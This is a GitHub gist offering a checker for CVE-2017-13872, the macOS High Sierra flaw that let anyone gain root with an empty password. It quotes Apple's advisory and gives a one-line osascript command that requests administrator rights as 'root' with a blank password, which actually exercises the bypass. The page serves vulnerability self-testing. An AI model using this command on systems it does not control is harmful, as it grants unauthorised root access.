Skip to content

Instantly share code, notes, and snippets.

@axelvf
Last active November 29, 2017 22:25
Show Gist options
  • Save axelvf/29168593fbb11e81613f5f911593658c to your computer and use it in GitHub Desktop.
Save axelvf/29168593fbb11e81613f5f911593658c to your computer and use it in GitHub Desktop.
High Sierra root vulnerability validator

High Sierra root vulnerability validator

Description

An attacker may be able to bypass administrator authentication without supplying the administrator’s password.

A logic error existed in the validation of credentials. This was addressed with improved credential validation.

CVE: CVE-2017-13872

Available for: macOS High Sierra 10.13.1

Not impacted: macOS Sierra 10.12.6 and earlier

Source: Apple Support

Usage

  • Open the launchpad (F4) and find Terminal application

  • Copy the following code in the console:

payload=$(osascript -e 'do shell script "whoami" with administrator privileges user name "root" password ""');if [ "$payload" = "root" ] ; then echo -e "\n\nVulnerable: Please update! \nMore info: https://support.apple.com/es-lamr/HT208315";else echo "Not Vulnerable";fi
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment